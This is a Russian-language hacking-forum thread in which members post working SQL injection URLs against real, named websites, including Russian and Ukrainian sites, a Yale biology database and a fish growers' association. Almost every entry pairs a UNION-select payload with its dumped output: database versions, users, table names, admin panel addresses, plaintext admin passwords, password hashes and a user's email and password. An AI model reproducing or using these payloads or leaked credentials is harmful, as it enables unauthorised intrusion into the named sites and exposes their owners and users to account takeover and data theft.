ANTICHAT - SQL Инъекции

ANTICHAT (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - SQL Инъекции (https://forum.antichat.xyz/showthread.php?t=21336)

Цитата:

Сообщение от Tigger

Админка: http://basem.co.uk/admin/
Но пароль не подходит((

Код:

http://www.basem.co.uk/article.php?id=-354+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password,email),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61+from+settings+limit+0,1/*

admin:basemc3ntral1:info@basem.co.uk
feeadmin:feeadmin3rr:info@basem.co.uk
detailsadmin:detailsadmin123:info@basem.co.uk

http://www.electrob.ru/news.php?act=by_id&news_id=-1+union+select+concat_ws(0x2F,version(),database() ,user()),2/*

4.1.22/site_electrob/electrob@localhost
----------------------------------------------------------------------------

http://www.tfdecor.ru/news/index.php?id=-1+union+select+1,2,3,concat_ws(0x2F,version(),data base(),user())/*

4.1.21-log/db00105457/00105457@localhost
----------------------------------------------------------------------------

liki.in.ua

http://liki.in.ua/index.html?r=4&nov=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6,7/*

5.0.45-log/liki/root@localhost

http://liki.in.ua/index.html?r=4&nov=-1+union+select+1,2,concat_ws(0x2F,user_login,user_ pass,user_email),4,5,6,7+from+3dom.wp_users+limit+ 0,1/*

логин/хеш/мейл
admin/b225a89b54f9b8df014a7a1a9a997f58/maxim@infosvit.com.ua

Код:

http://www.moiki.net/articles.php?id=99999+union+select+table_name,2+from+INFORMATION_SCHEMA.TABLES/*

lucifer542_moi@localhost:lucifer542_moi:5.0.45-community

http://www.logotypes.com.ua/category.php?id=-1+union+select+1,concat_ws(0x2f,version(),user(),d atabase())/*

www.m-economy.ru - Журнал Проблемы современной экономики

Код:

http://www.m-economy.ru/index.php3?rub=999+union+select+0,1,table_name,user(),4,5,6,7,8,version(),10,11,12,13,14,15,16,17,18,19,20,21,21,22,23,24,25,26,27,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+INFORMATION_SCHEMA.TABLES/*



5.0.45-log

mysqlmeconomy@web.delfa.net

www.emo.de - фирма какая-то

Код:

http://www.emo.de/de/index.php?news_id=-1+union+select+0,1,2,3,concat(version(),%22;%22,user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18/*



DB_NAME: db_20022_0001

DB_HOST: localhost

DB_USER: db_20022_0001

http://cgsc2.biology.yale.edu/

Код:

http://cgsc2.biology.yale.edu/Strain.php?ID=-68076+union+select+1,concat_ws(0x3a,user(),database(),version(),@@version_compile_os),3,4,5,6/*

user():WebUser@localhost
database():cgsc
version():5.0.27-standard-log
@@version_compile_os:apple-darwin8.5.1
root:1FAF9E2DAABFA7B67F973E07733089BFEECC5CA2

http://www.attik.ru/news.php?id=-1+union+select+1,2,3,4,concat_ws(0x2F,cast(version ()+as+binary),cast(database()+as+binary),cast(user ()+as+binary)),6/*

4.1.14-standard-log/u00043_attik/u00043_attik@localhost
-----------------------------------------------------------------------------

http://varga.narkote.net/news.php?id=-1+union+select+1,2,concat_ws(0x2F,cast(version()+a s+binary),cast(database()+as+binary),cast(user()+a s+binary)),4,5,6,7/*

4.1.16-standard-log/povedenie/rfcservice@lbarbero-2.m-10.ru

-----------------------------------------------------------------------------

http://www.nobilemebel.ru/index.asp?file=link&idLink=-1+or+1=@@version--

Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

http://www.nobilemebel.ru/index.asp?file=link&idLink=-1+or+1=(select+db_name())--

nobile

http://www.nobilemebel.ru/index.asp?file=link&idLink=-1+or+1=(select+system_user)--

nobile

http://www.forturist.com/show_new.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x2F,ve rsion(),database(),user())/*

4.1.22-standard-log/vladim_forturist/vladim_07usertur@localhost
----------------------------------------------------------------------------

carlson.ru

http://carlson.ru/news/view.php?id=-1'+union+select+1,2,3,4,5,concat_ws(0x2F,cast(vers ion()+as+binary),cast(database()+as+binary),cast(u ser()+as+binary)),7,8,9/*

4.1.14-standard/carlsonru/carlsonru@localhost

http://carlson.ru/news/view.php?id=-1'+union+select+1,2,3,4,5,concat_ws(0x2F,email,pas skey),7,8,9+from+users+limit+12000,1/*

мейл/пароль
vasel5k56@mail.ru/RPJCNJ74

elmu.aspu.ru - Астраханский государственный университет, Учебно-научная лаборатория "Познание человека"

Код:

http://elmu.aspu.ru/?news=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4/*

4.1.22-log:elmu:webmaster@localhost

eteplo.ru - Торгово-строительная компания "КМ-СЕРВИС"

Код:

http://eteplo.ru/index.php?act=system&id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5/*

4.1.22:eteplo:eteplo@localhost

Подобрал табы: news,cable,tech

wfga.net - The Washington Fish Growers Association

Код:

http://www.wfga.net/print.php?a=news&printid=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12/*

5.0.45-community:wfgaswe1_wfga:wfgaswe1_webacce@localhost

Табы:

Код:

DBSecurity,Events,Issues,Mailing_Cache,Members_Only,News_Articles,News_Galleries,Polls,Related_Articles,Site_Links,Tags,Templates,Tough_Domains,Updates_Subscribers

В табе DBSecurity поля:

Код:

ID,username,password

Админка здесь:

Код:

http://www.wfga.net/admin/

Админ [логин:пасс] :

Код:

wfga:viking2

-----------------------------------------------------------------

Grey:

------------Выкладывать шеллы в паблик нельзя------------

zdorovie-tv.ru

Цитата:

http://www.zdorovie-tv.ru/cgi-bin/forum_1.pl?action=viewbody&id=0+and+1=0+union+sele ct+concat(user,char(58),password),2,4,5,6,7,8,9,0, 0,0+from+mysql.user+limit+1,1/*

4.0.23-standard
root:2d8373280041e026:ctvm